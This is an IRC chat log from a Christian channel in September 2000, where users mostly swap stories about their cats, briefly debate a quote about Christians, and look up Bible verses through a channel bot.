[01:32] <Bond-007> Someone who follows Jesus Christ's teachings is the technical term
[01:32] *** Maverick (teri@203-79-65-231.tnt8.paradise.net.nz) has joined #CHristian
[01:32] <twile> !seen ricky77
[01:32] <Colin^> Hi Maverick
[01:33] <danimal> !seen danimal
[01:33] <weird> i like this room
[01:33] <eagles`> weird it is an expression first used at Antioch on the Palestinian coast around 70AD meaning those who follow Christ... initially a term of derision some folk will tell you
[01:33] <Maverick> Hi=)
[01:33] <Colin^> danimal was last on IRC channel #christian 8 minutes ago.]
[01:34] <eagles`> #Christian is a channel run by a number of Christians who are happy for anyone to come in and chat as long as they dont try and me nasty
[01:34] <danimal> thanks colin
[01:34] <weird> b
[01:34] <eagles`> yeah typo
[01:34] <weird> yeah :)
[01:35] <weird> i have a dog called Solomon
[01:35] <weird> same deal
[01:35] * Colin^ has a Cat called MrJordan Big Eyes
[01:35] *** cierra (Beloved@ppp-3-46.compuwise.net) has left #CHristian
[01:35] <eagles`> how is MrJordonBigEyes?
[01:35] -> *cierra* I think I know you from a long time ago?
[01:35] <weird> well my dog is a rottweiler
[01:36] <Bond-007> JordAn
[01:36] <Bond-007> :)
[01:36] *** konfused (la@1Cust211.tnt1.sjc4.da.uu.net) has joined #CHristian
[01:36] <eagles`> hey!!!!!! konfused
[01:36] <Colin^> eagles` he hasn't been in today, but his wonderings are going to be nipped in the bud soon
[01:36] <Colin^> ;o)
[01:36] <konfused> hello
[01:37] <eagles`> lol
[01:37] <Raid> My cats name is "Bug" well, it's "Sir red rusty bug." or, Bug for short ;p
[01:37] <eagles`> that seems to be what gets him into trouble
[01:37] <Colin^> :o)
[01:37] <weird> my cat is named jancy
[01:37] *** Eponine` (eponine@rocax1-169.dialup.optusnet.com.au) has joined #CHristian
[01:37] <Colin^> Raid have you seen my cats pic online yet?
[01:37] *** Disconnected
[01:37] * Raid is away since 01:37:58 - 09/09/2000 ( Auto-Away: Not here ) - Msgs will be saved.
[01:37] *** Attempting to rejoin...
#CHristian Cannot send to channel
[01:38] * Raid has returned ( Auto-Away: Not here ) - on 01:38:01 @ 09/09/2000 - Away 0 minutes.
[01:38] *** Rejoined channel #christian
[01:38] *** Topic is 'Encourage each other daily. (Hebrews 3:13)'
[01:38] *** Set by Beukeboom on Fri Sep 08 03:42:57
[01:38] <Bond-007> and a bunch of fish that I havent named :)
[01:38] -logos3- http://www.forchrist.net - channel website, for rules and other info.
[01:38] * eagles` sends for the plumber
[01:38] <Eponine`> I have 3 cats, Chloe, Furby and Sootie
[01:38] <Bond-007> Furby :)
[01:38] <weird> i had a dog called chloe once
[01:38] <konfused> furbies? those evil owl looking things?
[01:38] * Maverick has no cats.
[01:38] <Eponine`> yep :)
[01:38] * weird has no donkeys
[01:38] <konfused> those scare me :\
[01:39] <Eponine`> Furby is really fat and ORANGE and he purrs so loud
[01:39] <konfused> i dont have a donkey either :(
[01:39] <Eponine`> ooh my furby doesn't scare anyone :)
[01:39] <konfused> i gots a kitty tho
[01:39] <Colin^> Maverick Sophie is having kittens want one?
[01:39] *** sansan` (ff@ip13.vancouver6.dialup.canada.psi.net) has left #CHristian
[01:39] <Eponine`> wish i had a pic scanned you wouldn't be scared:)
[01:39] <weird> i dooooo but i cant
[01:39] <konfused> heh
[01:40] <Eponine`> I call him Furr for short :) my friend calls him furrball
[01:40] <konfused> well, i guess as long as u can take your cat's batteries out
[01:40] *** Wildernes (Grichblix@elk-ras1-cs-23.win.bright.net) has joined #CHristian
[01:40] <Eponine`> heheheehe
[01:40] <Colin^> Hey Wildernes
[01:40] <konfused> my kittie is mean :\
[01:40] <Wildernes> hey colin
[01:40] <Eponine`> ooh i have a mean kitty too konfused
[01:40] <Colin^> =^¡^=
[01:40] <Eponine`> Chloe is a mean cow of a thing :)
[01:40] <konfused> it waits at the stairs.. and jumps out at u and bites.. an it hurteses
[01:40] <weird> nice one Colin
[01:41] <eagles`> lol
[01:41] * weird is impressed
[01:41] <konfused> he's our little stair troll
[01:41] <Eponine`> hahaha konfused
[01:41] <Eponine`> mine comes up to you and smooches and purrs and rubs against your legs
[01:41] <Eponine`> then when you pat her she bites really hard
[01:41] <Eponine`> draws blood sometimes
[01:41] <Eponine`> im trying to give her away :P
[01:41] <konfused> my cat doesnt do that :\ he only walks up to bite you
[01:42] <Eponine`> she was a nice cat until I got furby, i think she got jealous
[01:42] * Colin^ 's Cat can ride a bike, and makes me dinner
[01:42] <Eponine`> and has never gotten over it
[01:42] <Bond-007> hmmm. heres a great quote:
[01:42] <Bond-007> "Christians are losers."
[01:42] <Bond-007> -Ted Turner
[01:42] <Eponine`> LOL Colin makes you dinner????
[01:42] <Eponine`> Ted Turner must suck then :P
[01:42] <konfused> oh! i want your cat colin
[01:42] <Colin^> Eponine` ;o)
[01:42] <Bond-007> Ted Turner is not that big at thinking up memorable things to say is he?
[01:42] <konfused> does he clean the house too?
[01:42] * eagles` wonders Ted Turner... CNN??
[01:42] <Colin^> konfused I have his pics on my web page
[01:42] <Eponine`> Colin i'll trade you for Chloe?
[01:42] <Bond-007> Ted Turner owns Superstation etc
[01:42] <Bond-007> He owns alot of cable channels
[01:43] <weird> =^!^=
[01:43] <Bond-007> He owns the Atlanta Braves
[01:43] <konfused> is he cooking in the pics?
[01:43] <weird> not the same
[01:43] <Eponine`> :o :o =^.^= :o :o
[01:43] *** Belle707 (hmm@B102-03.HUNT.splitrock.net) has joined #CHristian
[01:43] <danimal> bond if it is not so memorable then why are you quoteing it?
[01:43] <eagles`> superstation is big in europe
[01:43] * Belle707 sighs ... cant sleep.
[01:43] <eagles`> i watched a bit of it when I was in Sweden oooh 10 years ago
[01:43] <Eponine`> ,,,=^.^=,,, <-- that is Chloe
[01:43] <Colin^> http://mysite.xtra.co.nz/~ColinRHopper/page3.html <---Our cats pics
[01:43] *** Jewelz`` (~none@hh1125223.direcpc.com) has joined #CHristian
[01:44] <eagles`> hello Belle707 :))
[01:44] <konfused> heh thats not my kitty he doesnt have clawses
[01:44] <Wildernes> hey belle
[01:44] <Eponine`> i will look at them collie
[01:44] <Belle707> hey Wildernes
[01:44] *** TallCaMan (jeep@waltz.rahul.net) has joined #CHristian
[01:44] <Colin^> Hi Belle707
[01:44] <Bond-007> danimal: because I just saw it on a website
[01:44] <weird> =^{}^=
[01:44] <weird> aaaaak
[01:44] <Bond-007> It was an atheist and scoffer quote page
[01:45] <Bond-007> We spend the first
[01:45] <Bond-007> to walk and talk and the next twelve telling them to sit down and shut up.
[01:45] <Bond-007> --Phyllis Diller
[01:45] <Bond-007> hehehe
[01:45] <weird> how do ya turn stuff ?
[01:45] <^John^> Colin^ it says your page is down :/
[01:45] <Eponine`> collie: are those kitten photos recent?
[01:45] <danimal> so what is the purpose to quote him?
[01:45] <Eponine`> the orange one looks like furby :)
[01:45] *** twile (freezer@207.0.112.77) Quit (Ping timeout for twile[207.0.112.77])
[01:45] <Colin^> Eponine` one of them is a cat now
[01:45] <^John^> I went there cuz I love kittens
[01:45] <konfused> Oh! cute little kitty kats
[01:45] <Bond-007> danimal: to show how ignorant some people are
[01:46] <^John^> Hey how are u ppl getting it to load
[01:46] *** Twinsen (titusfox98@121.ppp1-2.osl1.world-online.no) has joined #CHristian
[01:46] <Colin^> Have a look at Mr Jordan Big Eyes
[01:46] <Eponine`> Colin did you keep any of them?
[01:46] <Eponine`> John try to refresh it?
[01:46] <Colin^> Eponine` yes one of the cameo one
[01:46] <danimal> what makes him ignore by that quote
[01:46] <danimal> hate‚ignorance
[01:46] *** cierra (Beloved@ppp-3-46.compuwise.net) has joined #CHristian
[01:47] <Bond-007> thinking that Christians are Losers. Its a broad vague ignorant statement.
[01:47] <Raid> Colin^: HEHEHE, nice kitty ;p
[01:47] <danimal> how is it ignorant?
[01:47] <Colin^> Raid he is a great cat
[01:48] <Wildernes> bond: but never underestimate the abiity of the press to quote things out of context.
[01:48] <konfused> silly kittys
[01:48] <Eponine`> Which one is the cameo one Colin?
[01:48] <Wildernes> who knows what he might have actually indended to say?
[01:48] <Colin^> Eponine` the light ginger ones
[01:48] <Colin^> Tes Turnip?
[01:48] <Colin^> Ted Turnip
[01:48] <Bond-007> Does he know every Christian ever alive?
[01:48] <Eponine`> I love orange ones:)
[01:48] *** Philip15 (CrAzzy@202.151.212.14) has joined #CHristian
[01:49] <konfused> aw now i wana go play wif my lil stair troll
[01:49] <konfused> but he'll beat me up :|
[01:49] <danimal> The only thing ignorant here is the standard at which ted judges losing
[01:49] <Bond-007> no. So he shouldn't say "Christians are losers." Its his opinion too. Personally I think we are winners because through Christ we have been saved and will live eternally for ever with the Lord and Saviour.
[01:49] <weird> turnips are a dun color
[01:49] <weird> oops sorry:(
[01:49] <Colin^> turnips are nice in soup
[01:50] <Eponine`> I have 2 kittens in my room with me now, the two nice ones:) they are
feeling the heat here in Rocky
[01:50] <Raid> shrug, bugs making a mess with his food bowl.
[01:50] <weird> and roasted n the oven
[01:50] *** Wildernes (Grichblix@elk-ras1-cs-23.win.bright.net) Quit (Leaving)
[01:50] *** ROCKIN4JC (BLAH@C47-ts1.timaru.com) has joined #CHristian
[01:50] * konfused skips off to find her kitty kat
[01:50] <Colin^> Hey ROCKIN4JC
[01:50] <Raid> He likes to get it out one piece at a time with his paw, and munch it out of
his paw.
[01:50] <danimal> bond that's great you have a different opinion
[01:50] <eagles`> lol
[01:50] <Raid> He always leaves big mess, where he drops some of it.
[01:51] <Raid> or starts munching it, and little fragments break off.
[01:51] <ROCKIN4JC> Hey Colin
[01:51] <Eponine`> Dogs have owners, Cats have staff ~~anonomous
[01:51] <Raid> messy mesy kitty
[01:51] *** Adelphos (LC@PPPa45-ResaleNashville3-5R7232.saturn.bbn.com) has joined #CHristian
[01:51] <^John^> Colin^ is it listed in the directory?
[01:51] <Colin^> Cats Rule Dogs Drool
[01:51] <konfused> i found my stair troll :)
[01:51] *** ROCKIN4JC (BLAH@C47-ts1.timaru.com) Quit (Leaving)
[01:51] <Raid> Colin^: heheh
[01:51] <Eponine`> hehehe
[01:51] <Raid> konfused: lol ;p
[01:51] <Colin^> ^John^ is what?
[01:51] <^John^> Your web oage
[01:51] <^John^> Page even
[01:52] <Eponine`> I like pigs too (the guinnea kind) they are furry pigs
[01:52] *** Adelphos (LC@PPPa45-ResaleNashville3-5R7232.saturn.bbn.com) has left #CHristian
[01:52] <weird> so are you guys seriously all christians?
[01:52] <Eponine`> Colin, Tiger is soooo cute! it's a she isn't it? a tortoise shell?
[01:52] <^John^> I am all a Christian
[01:52] <Bond-007> I am weird
[01:52] <Bond-007> err I am, weird
[01:52] <Jewelz``> weird, not I :)
[01:52] <Colin^> Eponine` yes, she squeeks like a mouse as well
[01:53] <Raid> Eponine`: I dunno about tiger, but I think the mrbig eyes one is a calico?
[01:53] * weird is not convinced
[01:53] <Raid> weird: No, I'm not a christian.
[01:53] <Colin^> weird not everyone in here is
[01:53] <Eponine`> cute colin :)))))))))
[01:53] <Eponine`> what is a calico, Raid? is that the colour?
[01:53] * Raid cat is a purebread long redhaired persian
[01:53] <Colin^> Raid Mr Jordan Big Eyes is the big cat with a coons tail, he is a Maine Coon
[01:53] <Raid> Eponine`: No, it's the bred.
[01:54] <danimal> weird: just like i don't have to believe an arguement to defend it
[01:54] <Raid> Colin^: HAHAHA, seriously?
[01:54] <Raid> he doesn't look like a coon from the pic.
[01:54] <Raid> no wait, I take that back.
[01:54] <Raid> he does.
[01:54] <salutar> Let my mouth be filled with Thy praise, that I may hymn Thy glory and Thy
majesty all the day long
[01:54] *** Skippii (wallaby@kawax3-189.dialup.optusnet.com.au) has joined #CHristian
[01:54] *** TallCaMan (jeep@waltz.rahul.net) Quit (Leaving)
[01:54] *** Skippii (wallaby@kawax3-189.dialup.optusnet.com.au) has left #CHristian
[01:54] <Raid> Colin^: how did you get a maine kitty all the way where you are?
[01:55] <Colin^> Raid he will go for a walk around the block at night with me
[01:55] <weird> calico cats are always female and called tortoiseshell sometimes cos of the
colour mix .... this is not a dictionary definition
[01:55] <Raid> weird: No...
[01:55] <Colin^> Raid, someone brought the bereed over here
[01:55] <Raid> weird: I had two male calico kitties.
[01:55] <weird> no way!
[01:55] <Raid> weird: Yes dude.
[01:55] *** Skypark (~rs@ppp10-iligan.mozcom.com) has joined #CHristian
[01:55] <Skypark> hi all
[01:55] <salutar> Let my mouth be filled with Thy praise, that I may hymn Thy glory and Thy
majesty all the day long
[01:55] <weird> always female
[01:56] <eagles`> hey Skypark
[01:56] <Raid> weird: hrm.. Nope. Had two calicos, and I know for a fact they were male ;p
[01:56] <eagles`> amen salutar
[01:56] <Colin^> weird yes tortisshell are always female
[01:56] <Skypark> hello big ""
[01:56] <Raid> standard calico
[01:56] <Skypark> hello big "e"
[01:56] <Skypark> :)
[01:56] <weird> than you Colin
[01:56] <weird> k
[01:56] <Raid> they don't have the as big white spot as colins.
[01:56] <Eponine`> oooh calico and tortoishell are the same??
[01:56] <Raid> Eponine`: No
[01:56] <weird> yeah
[01:56] <Raid> They are kinda built like siamese
[01:56] <Raid> long... slender things
[01:57] <weird> torti and callis are the same
[01:57] <weird> mixed breeds but cute
[01:57] <Raid> dude, I swear...
[01:57] <Raid> they were pure calicos
[01:57] <Raid> we had two of them.
[01:58] <weird> there is only only one pure calico......
[01:58] <Eponine`> all the tortis I know have attitudes :P
[01:58] <Colin^> calicos are different, Sophoie, one of our kittens is Cameo
[01:58] <Raid> Eponine`: they meow alot too ;p
[01:58] <Eponine`> yep sure do, really cute meows :)
[01:58] <Raid> and I mean alot.
[01:58] <Raid> yes yes
[01:58] <Eponine`> they are demanding!
[01:58] <Raid> Oh indeed
[01:58] <weird> calm down guys
[01:58] <Raid> if you don't pet them right away, they'll go out of there way to get in your
way so you do hehe
[01:58] <Eponine`> and they ignore you when they are tired too
[01:59] <Eponine`> hehehehe yep!
[01:59] <Raid> and they dont purr much
[01:59] <Raid> well, they do sometimes, but they meow more
[01:59] <Eponine`> one of mine, licks my fingers non stop
[01:59] <Raid> Bug on the other hand, he's a purrer
[01:59] <Raid> and a lap cat hehe
[01:59] <Eponine`> hehehehe
[01:59] <Eponine`> and a biter when she feels like it
[01:59] *** Tomm (Jasper@adsl-64-217-147-252.dsl.eulstx.swbell.net) has joined #CHristian
[01:59] <Raid> hes a cuddly bugsy wugsy
[01:59] *** Tomm (Jasper@adsl-64-217-147-252.dsl.eulstx.swbell.net) has left #CHristian
[02:00] *** Twinsen (titusfox98@121.ppp1-2.osl1.world-online.no) has left #CHristian
[02:00] <Eponine`> aww :)
[02:00] <Eponine`> have you got a picture?
[02:00] <Raid> Yep, but no scanner
[02:00] <Raid> heh
[02:00] <Raid> Bright red and orange.
[02:00] <Raid> with the orange stripes hehe
[02:00] <Raid> and the huge paws.
[02:00] <Eponine`> awww :)
[02:00] <Eponine`> both my tortis were strays
[02:00] *** Philip15 (CrAzzy@202.151.212.14) Quit (Broken pipe)
[02:00] <Raid> and hes lazy as heck
[02:00] <Eponine`> they are both dark with flecs of every colour :)
[02:00] <weird> my neice sent me a picture of a big pussy i thought it might be a joke and
it was
[02:01] <weird> ie
[02:01] <Raid> I've seen him stretch out in the middle of the kitchen floor. hehe
[02:01] <Eponine`> huge paws are so cute :)
[02:01] <Eponine`> they look like little lion cubs :)
[02:01] <Raid> YES
[02:01] <Raid> he resembles a baby lion or tiger ;p
[02:01] <Eponine`> hehe
[02:01] <Eponine`> kittens rule:)
[02:02] <Raid> but because he has a smushed in face, I have to clean his nose and eyes for
him. hehe
[02:02] <Eponine`> awww
[02:02] <Eponine`> my sootie the torti has a smushed face too
[02:02] <Eponine`> i think she might be part persian
[02:02] <Eponine`> her full name is Princess Sootie Lucky Buttons
[02:03] *** triasha (~welcome40@208.142.147.190) has joined #CHristian
[02:03] <Raid> hehehe
[02:03] <weird> recessive gene the torti thingie
[02:03] <triasha> mesay u there?
[02:03] <Colin^> Have you guys seen those bald cats?
[02:03] <ramdac> ?
[02:04] <Colin^> Ugly looking things
[02:04] <Eponine`> Sphinx?
[02:04] <konfused> those things look cool, lol
[02:04] <weird> (am i living up to my name?)
[02:04] <Eponine`> with huge ears and really bony
[02:04] <tree`> I have... on tv
[02:04] * konfused attempts to be wierder than weird
[02:04] *** ^John^ is now known as JohnBRB
[02:04] <Colin^> Austin Powers has a bald cat
[02:05] <weird> oh ok you have thi stage Konfused:)
[02:05] <tree`> those cats are supposed to be specially breaded
[02:05] <Eponine`> did anyone seen Cats the musical???
[02:05] <konfused> heh
[02:05] <Eponine`> I had front row, it was sooo cool
[02:05] * konfused be's weirder than weird
[02:05] <Eponine`> I got to touch the kittens :)
[02:05] *** thumps (awBabydawl@c949298-a.decatur1.il.home.com) has joined #CHristian
[02:05] <konfused> there, how was that? :)
[02:05] *** WingNut (psa23@A020-0450.TULS.splitrock.net) has joined #CHristian
[02:05] <Colin^> Hey thumps
[02:05] <Colin^> ...
[02:05] <Colin^> Hi ya WingNut
[02:05] <thumps> grrrrrreetings
[02:05] <thumps> heya Colin
[02:05] <Eponine`> and one of them took an audience member's coat and did little marching
girl (marching kitten, you know what i mean) it was soo cool
[02:05] <thumps> ...
[02:05] <thumps> wing
[02:05] <WingNut> Heya, thumps!
[02:05] <WingNut> Hey Colin^!!!! :o)
[02:06] * weird sees everybody luvs Colin
[02:06] *** ramdac (ramdac@1Cust138.tnt1.ruston.la.da.uu.net) Quit
[02:06] * weird included
[02:06] <weird> so kewl :)
[02:06] <Raid> Some people say cats are stupid because you can't train them. This isn't
true. it's not that you can't train them, it's easier for them to train you. ;p
[02:06] <Eponine`> Colin always meows at me :))))
[02:07] <konfused> my cat plays fetch
[02:07] <Eponine`> hahahaha raid, so true!
[02:07] <Eponine`> konfused, really"??????
[02:07] <Colin^> Eponine` have doene for 4 years or more
[02:07] <konfused> yup, much better than my dog too
[02:07] <Eponine`> yeppers:)
[02:07] <Eponine`> with a toy or what?
[02:07] <WingNut> Raid: I once heard someone make the observation: Humans train dogs, cats
train humans, nobody trains cats. So who is smarter?
[02:07] *** sunshineM (chris-p@cx989100-b.orng1.occa.home.com) has joined #CHristian
[02:07] <Raid> WingNut: LOL
[02:07] <konfused> yup :) this little stuffed monkey...
[02:08] <weird> ferrets
[02:08] <eagles`> interesting rofl
[02:08] <WingNut> Hey, sunshineM.
[02:08] *** sunshineM (chris-p@cx989100-b.orng1.occa.home.com) Quit (Read error to
sunshineM: EOF from client)
[02:08] <weird> oh and pigs and horses might get a mention
[02:08] <Eponine`> cool, confused :)
[02:08] <Eponine`> LOL wingnut
[02:08] <danimal> does logos have a topical concordance?
[02:08] <Eponine`> knofused, i mean
[02:08] <Eponine`> oops
[02:08] <Eponine`> konfused :)
[02:08] <konfused> heh
[02:08] * eagles` is off to do stuff offline... wish I could remember why I cam on line and
hour and a half ago, though
[02:09] <Colin^> danimal he will do simple searches
[02:09] <weird> bye eagles:)
[02:09] <Colin^> Bye eagles
[02:09] <eagles`> ooroo
[02:09] <Eponine`> byee eagles :)
[02:09] <Eponine`> ooroo
[02:09] <konfused> bye eagle
[02:09] <konfused> s
[02:09] <weird> tut such self control:)
[02:10] <weird> i have none
[02:10] * Eponine` either
[02:10] <Raid> Eponine`: My cat seems to know when I'm not feeling well too.
[02:10] <Raid> he'll come over and sit by me, and purr me a little tune.. sometimes even
kneed me.
[02:10] <eagles`> !skjv apostle
[02:10] <logos3> Seek Reply: Matthew 10:2, Mark 6:30, Acts 1:2, Acts 1:25, Acts 1:26, Romans
1:1, Romans 1:5, Acts 2:37, Luke 6:13, Acts 2:42, 1 Corinthians 1:1, Acts 2:43, 2
Corinthians 1:1, Galatians 1:1, Ephesians 1:1, Galatians 1:17, Galatians 1:19, Colossians
1:1, Galatians 2:8, 2 Timothy 1:1 ...
[02:10] <triasha> mmmeeeeeeeeesssssssaaaaaaaaayyyyyyyy txt nman dyan
[02:11] <eagles`> wonder if....
[02:11] <Colin^> Raid my cat does that if I am in bed with a BAD migraine, he will come and
cuddle up for hours
[02:11] <eagles`> !skjv acts apostle
[02:11] <Raid> when I have the flu it sucks, cause I have to make him get away from me, so I
dont get him sick. hehe
[02:11] <logos3> Seek Reply:
[02:11] <eagles`> no you can't use a modifier
[02:11] <weird> dogs lickings are healthy
[02:12] <Eponine`> Wow Raid mine does too :)
[02:12] <Eponine`> when i broke up with a BF and was upset, my cat (the nasty one who was
nice back then) wouldnt leave me alone hehehe
[02:12] <Eponine`> cats just seem to know, eh?
[02:12] <Raid> yep
[02:12] <danimal> colin do you believe that telepathy exitst?
[02:12] <Eponine`> i love when they kneed
[02:12] <Raid> bug seemed to know I was talking about him, cause he's perched himself on my
lap now.
[02:12] <Eponine`> its so cute
[02:13] <Raid> he ordered me to move my legs so he could sit comfortably. (he has a good
sense of how far into my skin he can put his claws.. hehe)
[02:13] <eagles`> sounds like the siamese I used to have
[02:13] <Colin^> danimal I used to do it
[02:13] *** Maverick (teri@203-79-65-231.tnt8.paradise.net.nz) Quit (Ping timeout for
Maverick[203-79-65-231.tnt8.paradise.net.nz])
[02:14] <Raid> I consider him to be more then a pet to me. heh
[02:14] <Colin^> So yes I do believe you can talk through it
[02:14] <Eponine`> hehehehe
[02:14] <Raid> hes like.. my best friend.
[02:14] <weird> big brother training of chaquita is kinda flawed
[02:14] <Raid> always there when I need someone to talk too.
[02:14] <danimal> Auras?
[02:14] <Eponine`> mine are my children :)
[02:14] <logos3> talk through what?
[02:14] <Eponine`> Furby is sitting on my computer desk now and purring
[02:14] <weird> BUT
[02:14] <Eponine`> can hardly move my mouse hehehe
[02:14] <logos3> oh :)
[02:14] <weird> very loving
[02:14] <Raid> hahahahaha
[02:14] * Colin^ has to go, Abbigail has made me two big hamburgers(my favourates)
[02:14] <Eponine`> yikes he's nearly falling off the desk but he's still asleep and purring
[02:15] *** eagles` (rashton@1Cust223.tnt4.adl1.da.uu.net) Quit (Pipe broken, plumber sent
for, priority low)
[02:15] <Raid> Eponine`: lol
[02:15] <Colin^> take care all
[02:15] <Eponine`> awww byeeee Collies take care
[02:15] <Bond-007> bye Colin^!!!!!!!!!
[02:15] <Skypark> heheheheh
[02:15] <weird> bye Col:)
[02:15] <Colin^> mews Eponine`
[02:15] <Eponine`> mews :)
[02:15] <Colin^> Bye Bond-007, take care
[02:15] <Skypark> na na na na na
[02:15] <Colin^> Bye weird, nice to meet you
[02:15] <Raid> Eponine`: If I don't pet bug when he arrives in my lap, He'll climb on top of
the keyboard and sit on it until I acknowledge him.
[02:15] * Eponine` 's Furby is the clumsiest cat ever :)
[02:15] <weird> u 2
[02:15] <Eponine`> LOL Raid, does he try to type???
[02:16] * konfused takes the batteries out of eponine's cat
[02:16] <Raid> Nope. he just knows my attentions on the computer, and he remedies the
problem hehe
[02:16] *** jamie^16 (~Jazzman@dx-52.pempe.net) Quit (Why do people cry when they hear the
word goodbye!!!!)
[02:16] <Eponine`> lol konfused!
[02:16] *** Colin^ (hello@p99-tnt1.ham.ihug.co.nz) Quit (And the Band played
on................and on................and on..................and
on..........................)
[02:16] *** Disconnected
[02:16] * Raid is away since 02:16:45 - 09/09/2000 ( Auto-Away: Not here ) - Msgs will be
saved.
[02:16] *** Attempting to rejoin...
#CHristian Cannot send to channel
* Timer 100 halted
* Timer 101 halted
[02:16] * Raid has returned ( Auto-Away: Not here ) - on 02:16:48 @ 09/09/2000 - Away 0
minutes.
[02:16] *** Rejoined channel #christian
[02:16] *** Topic is 'Encourage each other daily. (Hebrews 3:13)'
[02:16] *** Set by Beukeboom on Fri Sep 08 03:42:57
[02:16] -logos3- http://www.forchrist.net - channel website, for rules and other info.
[02:16] <Eponine`> aww
[02:16] <Eponine`> wb :)
[02:17] <Eponine`> Raid, sounds like he's got you wrapped around his little paw :)
[02:17] <Raid> lol
[02:17] <Raid> yep.
[02:17] <Bond-007> grrrrrr
[02:17] <Bond-007> stupid internet!
[02:17] <Bond-007> Why must you disconnect her!
[02:18] <Bond-007> I was talking to her asking her what time she wanted to be picked up and
she got disconnected
[02:18] <Eponine`> aww poor Bond
[02:19] <Bond-007> That makes me so mad
[02:19] <Bond-007> Its 11:19PM so too late to call
[02:19] <Eponine`> will she come back?
[02:19] <Bond-007> i hope
[02:19] *** jamie^16 (~Jazzman@dx-52.pempe.net) has joined #CHristian
[02:19] <Bond-007> Im gonna goto sleep soon so I can wake up early so I can call her and get
directions to her house etc
[02:20] *** KJV1611 (KJV1611@digital45.pm3-02.orlando-fl.bitstorm.net) has joined #CHristian
[02:20] *** ZoOrOpA (ash@ak-d76.actrix.co.nz) has joined #CHristian
[02:20] *** AceRadio (~AceRadio@ppp-207-193-1-178.kscymo.swbell.net) has joined #CHristian
[02:21] <Bond-007> well its been almost 5 minutes
[02:21] *** logos3 sets mode: +o ZoOrOpA
[02:21] <Bond-007> i dont think she is coming back
[02:21] *** ZoOrOpA sets mode: -o ZoOrOpA
[02:21] *** Disconnected
[02:21] * Raid is away since 02:21:32 - 09/09/2000 ( Auto-Away: Not here ) - Msgs will be
saved.
[02:21] *** Attempting to rejoin...
#CHristian Cannot send to channel
[02:21] *** Rejoined channel #christian
[02:21] *** Topic is 'Encourage each other daily. (Hebrews 3:13)'
[02:21] *** Set by Beukeboom on Fri Sep 08 03:42:57
[02:21] -logos3- http://www.forchrist.net - channel website, for rules and other info.
[02:21] <Bond-007> hi ZoOrOpA
[02:21] <weird> i luv these nicks
[02:21] <AceRadio> wb raid
[02:21] <ZoOrOpA> hi
[02:21] <Eponine`> wb Raid
[02:22] *** Luther (~Boggs@iq-col-as000-158.iquest.net) has joined #CHristian
[02:22] <AceRadio> Welcome to #Christian, luther
[02:23] <AceRadio> has thatcher been on lately?
[02:24] <danimal> yesterday
[02:24] <AceRadio> hmmm
[02:24] *** weird (mirr@edtntnt3-port-57.dial.telus.net) Quit (Leaving)
[02:24] <AceRadio> niv rev 2:3
[02:25] <AceRadio> guess the bots are down right now
[02:25] <danimal> !niv rev 2:3
[02:25] <logos3> danimal: Rev 2:3 "3 You have persevered and have endured hardships for my
name, and have not grown weary." (NIV)
[02:25] <AceRadio> gotta use the '!"?
[02:25] <danimal> yup
[02:25] <AceRadio> !niv rev 2:5
[02:25] <logos3> AceRadio: Rev 2:5 "5 Remember the height from which you have fallen! Repent
and do the things you did at first. If you do not repent, I will come to you and remove your
lampstand from its place." (NIV)
[02:25] <AceRadio> ah, ok
[02:26] <AceRadio> !niv jeremiah 3:8
[02:26] *** TopTed (GuitarLab@208.44.38.171) has joined #CHristian
[02:26] <logos3> AceRadio: Jeremiah 3:8 "8 I gave faithless Israel her certificate of
divorce and sent her away because of all her adulteries. Yet I saw that her unfaithful
sister Judah had no {fear;} she also went out and committed adultery." (NIV)
[02:26] <AceRadio> Welcome to #Christian, topted
[02:26] <TopTed> hi AceRadio
[02:26] *** ZoOrOpA (ash@ak-d76.actrix.co.nz) Quit (The Moon is up..and over One Tree
Hill.....we see the sun go down in your eyes.....)
[02:26] *** Shaina` (Home@PPP209-167-45-81.tintopp.com) has joined #CHristian
[02:26] <AceRadio> Welcome to #Christian, shaina`
[02:27] *** CodePoet (kenneth@yak-p2-14.wolfenet.com) Quit (The quest for faith is a lunar
endevour, not warmer and brighter, but darker and wetter.)
[02:27] <AceRadio> !niv jeremiah 4:2
[02:27] <logos3> AceRadio: Jeremiah 4:2 "2 and if in a truthful, just and righteous way you
swear, 'As surely as the LORD lives,' then the nations will be blessed by him and in him
they will glory.'" (NIV)
[02:27] <Shaina`> thanks for welcome me AceRadio
[02:27] <AceRadio> yw
[02:28] <Shaina`> :)
[02:28] <AceRadio> !niv luke 4:9
[02:28] <logos3> AceRadio: Luke 4:9 "9 The devil led him to Jerusalem and had him stand on
the highest point of the temple. 'If you are the Son of God,' he said, 'throw yourself down
from here." (NIV)
[02:28] <TacoMan> anyone want to see a funny log message me
[02:28] <TopTed> !kjv proverbs 30:4
[02:28] <logos3> TopTed: Proverbs 30:4 "4 Who hath ascended up into heaven, or descended?
who hath gathered the wind in his fists? who hath bound the waters in a garment? who hath
established all the ends of the earth? what is his name, and what is his son's name, if thou
canst tell?" (KJV)
[02:29] *** Bond-007 (PBrosnan@17-133.nctimes.net) Quit (Ping timeout for
Bond-007[17-133.nctimes.net])
[02:29] <AceRadio> !niv psalm 1:45
[02:29] <logos3> AceRadio: Psalm 1:45 "" (NIV)
[02:29] <AceRadio> !niv psalm 14:5
[02:29] <logos3> AceRadio: Psalm 14:5 "5 There they are, overwhelmed with dread, for God is
present in the company of the righteous." (NIV)
[02:30] <TopTed> !kjv luke 4:20-21
[02:30] <logos3> TopTed: Luke 4:20-21 "20 And he closed the book, and he gave it again to
the minister, and sat down. And the eyes of all them that were in the synagogue were
fastened on him. 21 And he began to say unto them, This day is this
[02:30] <logos3> scripture fulfilled in your ears." (KJV)
[02:30] *** Luther (~Boggs@iq-col-as000-158.iquest.net) has left #CHristian
[02:31] *** TacoMan (taco_man17@pm3a-176.dillon.mcn.net) Quit (Excess Flood)
[02:32] *** charisma (~Jazzman@dx-52.pempe.net) has joined #CHristian
[02:32] <AceRadio> Welcome to #Christian, charisma
[02:33] <Shaina`> how are you AceRadio?
[02:33] *** Helt (cs@cs28150-130.satx.rr.com) has joined #CHristian
[02:33] <AceRadio> Welcome to #Christian, helt
[02:33] <AceRadio> shaina- i'm good
[02:33] *** Helt (cs@cs28150-130.satx.rr.com) has left #CHristian
[02:33] <AceRadio> shaina- u?
[02:33] *** bu2zard (~wanabe@203.106.34.67) has joined #CHristian
[02:33] <AceRadio> Welcome to #Christian bu2zard
[02:33] <Shaina`> AceRadio: i'm great thanks :)
[02:34] <bu2zard> hi
[02:34] *** jamie^16 (~Jazzman@dx-52.pempe.net) has left #CHristian
[02:34] *** bu2zard (~wanabe@203.106.34.67) has left #CHristian
